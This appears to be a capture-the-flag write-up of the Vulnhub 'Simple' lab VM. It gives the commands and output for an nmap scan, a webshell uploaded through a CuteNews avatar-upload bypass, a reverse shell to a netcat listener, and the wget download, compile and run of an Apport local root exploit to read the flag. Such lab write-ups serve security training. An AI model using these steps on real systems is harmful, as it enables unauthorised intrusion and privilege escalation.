BNE0x03 - Simple Writeup

This time, we are doing bull's vm Simple.

First things first, we nmap the host

[email protected]:~# nmap -A -T4 -sV -p- -v 192.168.1.74

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-09 14:44 EEST
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Initiating ARP Ping Scan at 14:44
Scanning 192.168.1.74 [1 port]
Completed ARP Ping Scan at 14:44, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:44
Completed Parallel DNS resolution of 1 host. at 14:44, 0.00s elapsed
Initiating SYN Stealth Scan at 14:44
Scanning simple.lan (192.168.1.74) [65535 ports]
Discovered open port 80/tcp on 192.168.1.74
Completed SYN Stealth Scan at 14:44, 17.69s elapsed (65535 total ports)
Initiating Service scan at 14:44
Scanning 1 service on simple.lan (192.168.1.74)
Completed Service scan at 14:44, 6.03s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against simple.lan (192.168.1.74)
NSE: Script scanning 192.168.1.74.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.36s elapsed
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Nmap scan report for simple.lan (192.168.1.74)
Host is up (0.0023s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Index of /
MAC Address: 08:00:27:60:21:5C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.182 days (since Mon May  9 10:23:09 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: 127.0.1.1

TRACEROUTE
HOP RTT     ADDRESS
1   2.33 ms simple.lan (192.168.1.74)

NSE: Script Post-scanning.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.97 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

We only got port 80 open so let's see what's on that.


CuteNews v.2.0.3. We look for any vulnerabilities regarding that specific app on exploit db.
There is indeed an  Arbitrary File Upload Vulnerability.

First, we register for a new user


Then, at the Personal Options page we need to change the avatar with our webshell. we select a php file with extension .jpg and edit the post parameter of the file name and change it from .jpg to .php, after it has been submitted to bypass user-side file security.


Upon submitting the edited post request, the notification says that the changes to the avatar have been made.


After the shell has been uploaded, we just need to navigate to uploads/avatar_<username>_<file> in my case uploads/avatar_gknsb_shell.php.

Time for local privilege escalation. I start enumerating the system through b374k webshell.

/var/www/>uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

/var/www/>cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.2 LTS

After some search, and a few failed attempts with overlayfs exploits, in exploit-db I come accross this Apport Local Root exploit.

For an exploit to elevate our privileges we need to escape the webshell and get a reverse shell instead. In b374k, I navigate to the Network tab and establish a reverse shell like so.


Before hitting the "run" button, I have started a netcat listener locally on port 443 so since the reverse shell is established let's go through with the escalation.

[email protected]:~# nc -lvv -p 443
listening on [any] 443 ...
connect to [192.168.1.77] from simple.lan [192.168.1.74] 54344
b374k shell : connected
/bin/sh: 0: can't access tty; job control turned off
/tmp>wget https://www.exploit-db.com/download/36746
--2016-05-09 08:31:57--  https://www.exploit-db.com/download/36746
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5216 (5.1K) [application/txt]
Saving to: '36746'

     0K .....                                                 100%  155M=0s

2016-05-09 08:31:58 (155 MB/s) - '36746' saved [5216/5216]

/tmp>mv 36746 exploit.c
/tmp>gcc -o sploit exploit.c -static
exploit.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
 # warning this file must be compiled with -static
   ^
/tmp>./sploit
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
whoami
root

At this point our job is almost done. What is left is to spawn an interactive shell, and go grab the flag.

id  
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/tmp# cd /root/  
cd /root/
[email protected]:/root# ls -l
ls -l
total 4
-rw------- 1 root root 52 Sep 21  2015 flag.txt
[email protected]:/root# cat flag.txt
cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
[email protected]:/root#

That's it. Thanks a lot to RobertWinkel for creating the vm and Vulnhub for hosting it. Cheers!

Comments